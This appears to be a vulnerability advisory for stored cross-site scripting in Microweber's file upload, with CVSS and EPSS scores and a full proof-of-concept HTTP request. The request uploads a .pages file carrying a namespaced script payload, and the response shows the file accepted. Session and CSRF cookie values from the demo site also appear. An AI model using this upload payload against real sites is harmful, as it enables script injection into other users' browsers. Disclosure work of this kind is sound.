5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
17.9%
In file upload function, the server allow upload .pages
file with contain some javascript code lead to XSS
.
REQUEST:
POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Ashop/action%3Aproducts%23action%3Dnew%3Aproduct; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 961
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:shop/action:products
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="name"
xss_poc.pages
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunk"
0
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunks"
1
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream
<?xml version="1.0" encoding="UTF-8"?>
<html>
<head></head>
<body>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
<info>
<name>
<value>123</value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
-----------------------------80883503232369887683205133266--
RESPONSE:
HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:10:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:10:19 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 133
{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss-poc.pages","name":"xss-poc.pages","bytes_uploaded":"961"}
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
17.9%